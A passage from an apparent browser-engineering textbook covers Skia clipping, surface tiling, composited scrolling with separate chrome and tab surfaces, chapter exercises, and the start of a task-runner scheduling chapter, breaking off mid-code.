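To see the conditional save/clip/restore pattern in action, here is a sketch using a fake canvas that merely records the calls it receives. (Both classes below are illustrative re-creations, not the browser’s code: the “rrect” is a placeholder value, since building a real skia.RRect isn’t needed to show the pattern.)

```python
# A fake canvas that logs calls, plus a ClipRRect-style command with
# the same conditional save/clip/restore structure as above.
class FakeCanvas:
    def __init__(self):
        self.log = []
    def save(self):
        self.log.append("save")
    def clipRRect(self, rrect):
        self.log.append("clipRRect")
    def restore(self):
        self.log.append("restore")

class ClipRRect:
    def __init__(self, rrect, children, should_clip=True):
        self.rrect = rrect
        self.children = children
        self.should_clip = should_clip

    def execute(self, canvas):
        if self.should_clip:
            canvas.save()
            canvas.clipRRect(self.rrect)
        for cmd in self.children:
            cmd.execute(canvas)
        if self.should_clip:
            canvas.restore()

canvas = FakeCanvas()
ClipRRect("rrect", [], should_clip=True).execute(canvas)
print(canvas.log)   # ['save', 'clipRRect', 'restore']

canvas2 = FakeCanvas()
ClipRRect("rrect", [], should_clip=False).execute(canvas2)
print(canvas2.log)  # []: no clip means no canvas state is touched
```

When should_clip is false the command is a pure pass-through, which is why skipping unnecessary clips costs nothing.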
Now, in paint_visual_effects
, we can use
ClipRRect
instead of destination-in blending with
DrawRRect
(and we can fold the opacity into the
skia.Paint
passed to the outer SaveLayer
,
since that is defined to be applied before blending):
def paint_visual_effects(node, cmds, rect):
    # ...
    return [
        SaveLayer(skia.Paint(BlendMode=blend_mode, Alphaf=opacity), [
            ClipRRect(rect, clip_radius, cmds,
                should_clip=needs_clip),
        ], should_save=needs_blend_isolation),
    ]
Of course, clipRRect
only applies for rounded
rectangles, while masking is a general technique that can be used to
implement all sorts of clips and masks (like CSS’s
clip-path
and mask
), so a real browser will
typically have both code paths.
So now, each element uses at most one surface, and even then only if it has opacity or a non-default blend mode. Everything else should look visually the same, but will be faster and use less memory.
Besides using fewer surfaces, real browsers also need to avoid surfaces getting too big. Real browsers use tiling for this, breaking up the surface into a grid of tiles which have their own raster surfaces and their own x and y offset to the page. Whenever content that intersects a tile changes its display list, the tile is re-rastered. Tiles that are not on or “near”For example, tiles that just scrolled off-screen. the screen are not rastered at all. This all happens on the GPU, since surfaces (Skia ones in particular) can be stored on the GPU.
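The tile-selection arithmetic behind this can be sketched in a few lines. (The 256-pixel tile size and the function below are hypothetical choices for illustration; real browsers pick tile sizes based on GPU texture limits and other constraints.)

```python
# Sketch: which tile rows does a viewport intersect?
TILE_SIZE = 256  # hypothetical tile height in pixels

def visible_tiles(scroll_y, viewport_h, page_h):
    # First and last tile rows touched by the visible region.
    first = max(0, scroll_y) // TILE_SIZE
    last = min(page_h, scroll_y + viewport_h - 1) // TILE_SIZE
    return list(range(first, last + 1))

# Scrolled 300px into a 10000px page with a 600px-tall window:
print(visible_tiles(300, 600, 10000))  # [1, 2, 3]
```

Only the listed tiles need raster surfaces at all; the rest can be rastered lazily as the user scrolls toward them.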
Optimizing away surfaces is great when they’re not needed, but sometimes having more surfaces allows faster scrolling and animations. (In this section we’ll optimize scrolling; animations will have to wait for Chapter 13.)
So far, any time anything changed in the browser chrome or the web page itself, we had to clear the canvas and re-raster everything on it from scratch. This is inefficient—ideally, things should be re-rastered only if they actually change. When the content is complex or the screen is large, rastering too often produces a visible slowdown, and laptop and mobile batteries are drained unnecessarily. Real browsers optimize these situations by using a technique I’ll call browser compositing. The idea is to create a tree of explicitly cached surfaces for different pieces of content. Whenever something changes, we’ll re-raster only the surface where that content appears. Then these surfaces are blended (or “composited”) together to form the final image that the user sees.
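The caching idea can be sketched with a toy model: surfaces carry a dirty flag, and compositing re-rasters only the dirty ones. (The Surface class here is a stand-in written for illustration, not Skia’s.)

```python
# Toy browser compositing: cached surfaces with dirty flags.
class Surface:
    def __init__(self, name):
        self.name = name
        self.dirty = True       # needs raster before first use
        self.raster_count = 0   # how many times we've rastered it

    def raster_if_needed(self):
        if self.dirty:
            self.raster_count += 1
            self.dirty = False

def composite(surfaces):
    # Re-raster only dirty surfaces, then (conceptually) blend all of
    # the cached surfaces into the final frame.
    for s in surfaces:
        s.raster_if_needed()

chrome, tab = Surface("chrome"), Surface("tab")
composite([chrome, tab])   # first frame: both surfaces raster once
chrome.dirty = True        # e.g. the user types in the address bar
composite([chrome, tab])   # only the chrome surface re-rasters
print(chrome.raster_count, tab.raster_count)  # 2 1
```

The page-content surface stays untouched across chrome-only changes, which is precisely the saving described above.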
Let’s implement this, with a surface for browser chrome and a surface
for the current Tab
’s contents. This way, we’ll only need
to re-raster the Tab
surface if page contents change, but
not when (say) the user types into the address bar. This technique also
allows us to scroll the Tab
without any raster at all—we
can just translate the page contents surface when drawing it.
To start with, we’ll need two new surfaces on Browser, chrome_surface and tab_surface. (We could even use a different surface for each Tab, but real browsers don’t do this, since each surface uses up a lot of memory, and typically users don’t notice the small raster delay when switching tabs.)
class Browser:
    def __init__(self):
        # ...
        self.chrome_surface = skia.Surface(WIDTH, CHROME_PX)
        self.tab_surface = None
I’m not explicitly creating tab_surface
right away,
because we need to lay out the page contents to know how tall the
surface needs to be.
We’ll also need to split the browser’s draw
method into
three parts:
draw will composite the chrome and tab surfaces and copy the result from Skia to SDL; raster_tab will draw the page to the tab_surface; and raster_chrome will draw the browser chrome to the chrome_surface. Let’s start by doing the split:
class Browser:
    def raster_tab(self):
        canvas = self.tab_surface.getCanvas()
        canvas.clear(skia.ColorWHITE)
        # ...

    def raster_chrome(self):
        canvas = self.chrome_surface.getCanvas()
        canvas.clear(skia.ColorWHITE)
        # ...

    def draw(self):
        canvas = self.root_surface.getCanvas()
        canvas.clear(skia.ColorWHITE)
        # ...
Since we didn’t create the tab_surface on startup, we need to create it at the top of raster_tab. (For a very big web page, the tab_surface can be much larger than the size of the SDL window, and therefore take up a very large amount of memory. We’ll ignore that, but a real browser would only paint and raster surface content up to a certain distance from the visible region, and re-paint/raster as the user scrolls.)
import math

class Browser:
    def raster_tab(self):
        active_tab = self.tabs[self.active_tab]
        tab_height = math.ceil(active_tab.document.height)
        if not self.tab_surface or \
                tab_height != self.tab_surface.height():
            self.tab_surface = skia.Surface(WIDTH, tab_height)
        # ...
The way we compute the page bounds here, based on the layout tree’s height, would be incorrect if page elements could stick out below (or to the right) of their parents—but our browser doesn’t support any features like that. Note that we need to recreate the tab surface if the page’s height changes.
Next, we need new code in draw to copy from the chrome and tab surfaces to the root surface. Moreover, we need to translate the tab_surface down by CHROME_PX and up by scroll, and clip it to only the area of the window that doesn’t overlap the browser chrome:
class Browser:
    def draw(self):
        # ...
        tab_rect = skia.Rect.MakeLTRB(0, CHROME_PX, WIDTH, HEIGHT)
        tab_offset = CHROME_PX - self.tabs[self.active_tab].scroll
        canvas.save()
        canvas.clipRect(tab_rect)
        canvas.translate(0, tab_offset)
        self.tab_surface.draw(canvas, 0, 0)
        canvas.restore()

        chrome_rect = skia.Rect.MakeLTRB(0, 0, WIDTH, CHROME_PX)
        canvas.save()
        canvas.clipRect(chrome_rect)
        self.chrome_surface.draw(canvas, 0, 0)
        canvas.restore()
        # ...
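As a sanity check on the translation arithmetic: a point at page coordinate page_y lands on screen at page_y + CHROME_PX - scroll. (The CHROME_PX value below is chosen arbitrarily for the sketch.)

```python
# Where does a page y-coordinate land on screen after the translate?
CHROME_PX = 100  # arbitrary chrome height for this sketch

def screen_y(page_y, scroll):
    return page_y + CHROME_PX - scroll

print(screen_y(0, 0))      # 100: top of the page sits just below the chrome
print(screen_y(250, 250))  # 100: after scrolling 250px, that point moves up to the same spot
```

The clipRect call then discards anything this formula places above CHROME_PX, so page content never draws over the browser chrome.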
Finally, everywhere in Browser
that we call
draw
, we now need to call either raster_tab
or
raster_chrome
first. For example, in
handle_click
, we do this:
class Browser:
    def handle_click(self, e):
        if e.y < CHROME_PX:
            # ...
            self.raster_chrome()
        else:
            # ...
            self.raster_tab()
        self.draw()
Notice how we don’t redraw the chrome when only the tab changes, and
vice versa. In handle_down
, which scrolls the page, we
don’t need to call raster_tab
at all, since scrolling
doesn’t change the page.
We also have some related changes in Tab
. First, we no
longer need to pass around the scroll offset to the execute
methods, or account for CHROME_PX
, because we always draw
the whole tab to the tab surface:
class Tab:
    def raster(self, canvas):
        for cmd in self.display_list:
            cmd.execute(canvas)
Likewise, we can remove the scroll
parameter from each
drawing command’s execute
method:
class DrawRect:
    def execute(self, canvas):
        paint = skia.Paint()
        paint.setColor(parse_color(self.color))
        canvas.drawRect(self.rect, paint)
Our browser now uses composited scrolling, making scrolling faster and smoother. In fact, in terms of conceptual phases of execution, our browser is now very close to real browsers: real browsers paint display lists, break content up into different rastered surfaces, and finally draw the tree of surfaces to the screen. There’s more we can do for performance—ideally we’d avoid all duplicate or unnecessary operations—but let’s leave that for the next few chapters.
Real browsers allocate new surfaces for various different situations,
such as implementing accelerated overflow scrolling and animations of
certain CSS properties such as transform
and opacity that can be done without raster. They also allow scrolling
arbitrary HTML elements via overflow: scroll
in CSS. Basic scrolling for DOM elements is very similar to what we’ve
just implemented. But implementing it in its full generality, and with
excellent performance, is extremely challenging. Scrolling is
probably the single most complicated feature in a browser rendering
engine. The corner cases and subtleties involved are almost endless.
So there you have it: our browser can draw not only boring text and boxes but also visual effects, including opacity, blend modes (via mix-blend-mode), and clipping with rounded corners.
Besides the new features, we’ve upgraded from Tkinter to SDL and Skia, which makes our browser faster and more responsive, and also sets a foundation for more work on browser performance to come.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(canvas)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(canvas)
def __repr__()
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(canvas)
def __repr__()
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
INPUT_WIDTH_PX
class Browser:
def __init__()
def handle_down()
def handle_click(e)
def handle_key(char)
def handle_enter()
def load(url)
def paint_chrome()
def draw()
def raster_tab()
def raster_chrome()
def handle_quit()
EVENT_DISPATCH_CODE
COOKIE_JAR
class URL:
def __init__(url)
def request(top_level_url, payload)
def resolve(url)
def origin()
class JSContext:
def __init__(tab)
def run(code)
def dispatch_event(type, elt)
def get_handle(elt)
def querySelectorAll(selector_text)
def getAttribute(handle, attr)
def innerHTML_set(handle, s)
def XMLHttpRequest_send(method, url, body)
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
def allowed_request(url)
def raster(canvas)
FONTS
def get_font(size, weight, style)
def parse_color(color)
def parse_blend_mode(blend_mode_str)
def linespace(font)
class SaveLayer:
def __init__(sk_paint, children, should_save, should_paint_cmds)
def execute(canvas)
class DrawRRect:
def __init__(rect, radius, color)
def execute(canvas)
class ClipRRect:
def __init__(rect, radius, children, should_clip)
def execute(canvas)
def paint_visual_effects(node, cmds, rect)
if __name__ == "__main__"
If you run it, it should look something like this page; due to the browser sandbox, you will need to open that page in a new tab.
CSS transforms: Add support for the transform CSS property, specifically the translate and rotate transforms. (There is a lot more complexity to 3D transforms having to do with the definition of 3D spaces, flattening, backfaces, and plane intersections. Skia has built-in support for these via canvas state.)
Filters: The filter
CSS property allows
specifying various kinds of more complex
effects, such as grayscale or blur. These are fun to implement, and
a number of them have built-in support in Skia. Implement, for example,
the blur
filter. Think carefully about when filters occur,
relative to other effects like transparency, clipping, and blending.
Hit testing: If you have an element with a
border-radius
, it’s possible to click outside the element
but inside its containing rectangle, by clicking in the part of the
corner that is “rounded off”. This shouldn’t result in clicking on the
element, but in our browser it currently does. Modify the
click
method to take border radii into account.
Interest region: Our browser now draws the whole web page to
a single surface, and then shows parts of that surface as the user
scrolls. That means a very long web page (like this one!) can create a
large surface, thereby using a lot of memory. Modify the browser so that
the height of that surface is limited, say to 4 * HEIGHT
pixels. The (limited) region of the page drawn to this surface is called
the interest region; you’ll need to track what part of the interest
region is being shown on the screen, and re-raster the interest region
when the user attempts to scroll outside of it.
One way to do this is to filter out all display list items that don’t
intersect the interest rect. Another, easier way is to take advantage of
Skia’s internal optimizations: if you call save
and
clipRect
on a Skia canvas and then some draw operations,
Skia will automatically avoid display item raster work outside of the
clipping rectangle before the next restore
.
Z-index: Right now, elements later in the HTML document are
drawn “on top” of earlier ones. The z-index
CSS property
changes that order: an element with the larger z-index
draws on top (with ties broken by the current order, and with the
default z-index
being 0). For z-index
to have
any effect, the element’s position
property must be set to
something other than static
(the default). Add support for
z-index
. One thing you’ll run into is that with our
browser’s minimal layout features, you might not be able to
create any overlapping elements to test this feature! However,
lots of exercises throughout the book allow you to create overlapping
elements, including transform
and
width
/height
. For an extra challenge, add
support for nested
elements with z-index
properties.
Overflow scrolling: An element with the
overflow
property set to scroll
and a fixed
pixel height
is scrollable. (You’ll want to implement the
width/height exercise from Chapter 6
so that height
is supported.) Implement some version of
overflow: scroll
. I recommend the following user
interaction: the user clicks within a scrollable element to focus it,
and then can press the arrow keys to scroll up and down. You’ll need to
keep track of the layout
overflow. For an extra challenge, make sure you support
scrollable elements nested within other scrollable elements.
Modern browsers must run sophisticated applications while staying responsive to user actions. Doing so means choosing which of its many tasks to prioritize and which to delay until later—tasks like JavaScript callbacks, user input, and rendering. Moreover, browser work must be split across multiple threads, with different threads running events in parallel to maximize responsiveness.
So far, most of the work our browser’s been doing has come from user actions like scrolling, pressing buttons, and clicking on links. But as the web applications our browser runs get more and more sophisticated, they begin querying remote servers, showing animations, and prefetching information for later. And while users are slow and deliberative, leaving long gaps between actions for the browser to catch up, applications can be very demanding. This requires a change in perspective: the browser now has a never-ending queue of tasks to do.
Modern browsers adapt to this reality by multitasking, prioritizing, and deduplicating work. Every bit of work the browser might do—loading pages, running scripts, and responding to user actions—is turned into a task, which can be executed later. (By writing *args as an argument to Task below, we indicate that a Task can be constructed with any number of arguments, which are then available as the list args. Then, calling a function with *args unpacks the list back into multiple arguments.) A task is just a function (plus its arguments) that can be executed:
class Task:
    def __init__(self, task_code, *args):
        self.task_code = task_code
        self.args = args
        self.__name__ = "task"

    def run(self):
        self.task_code(*self.args)
        self.task_code = None
        self.args = None
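For a runnable sketch of how a task wraps a function and its arguments, here is the Task class again together with a usage example. (The list-append callback is just an illustration; any callable works.)

```python
# A Task captures a function plus its arguments for later execution.
class Task:
    def __init__(self, task_code, *args):
        self.task_code = task_code
        self.args = args

    def run(self):
        self.task_code(*self.args)
        # Drop references so captured state can be garbage-collected.
        self.task_code = None
        self.args = None

results = []
task = Task(results.append, "hello")  # created now...
task.run()                            # ...run later
print(results)  # ['hello']
```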
The point of a task is that it can be created at one point in time, and then run at some later time by a task runner of some kind, according to a scheduling algorithm.The event loops we discussed in Chapter 2 and Chapter 11 are task runners, where the tasks to run are provided by the operating system. In our browser, the task runner will store tasks in a first-in first-out queue:
class TaskRunner:
    def __init__(self, tab):
        self.tab = tab
        self.tasks = []

    def schedule_task(self, task):
        self.tasks.append(task)
When the time comes to run a task, our task runner can just remove the first task from the queue and run it:First-in-first-out is a simplistic way to choose which task to run next, and real browsers have sophisticated schedulers which consider many different factors.
class TaskRunner:
    def run(self):
        if len(self.tasks) > 0:
            task = self.tasks.pop(0)
            task.run()
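Putting the two together, here is a self-contained sketch of the first-in first-out behavior, with the Tab plumbing omitted. (These are simplified re-creations for illustration.)

```python
# FIFO task scheduling: tasks run in the order they were scheduled.
class Task:
    def __init__(self, task_code, *args):
        self.task_code, self.args = task_code, args
    def run(self):
        self.task_code(*self.args)

class TaskRunner:
    def __init__(self):
        self.tasks = []
    def schedule_task(self, task):
        self.tasks.append(task)
    def run(self):
        if len(self.tasks) > 0:
            task = self.tasks.pop(0)
            task.run()

order = []
runner = TaskRunner()
runner.schedule_task(Task(order.append, 1))
runner.schedule_task(Task(order.append, 2))
runner.run()
runner.run()
print(order)  # [1, 2]: first in, first out
```

Each call to run executes at most one task, which is what lets the event loop interleave task execution with rendering and input handling.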
To run those tasks, we need to call the run
method on
our TaskRunner
, which we can do in the main event loop:
class Tab:
    def __init__(self):
        self.task_runner = TaskRunner(self)

if __name__ == "__main__":
while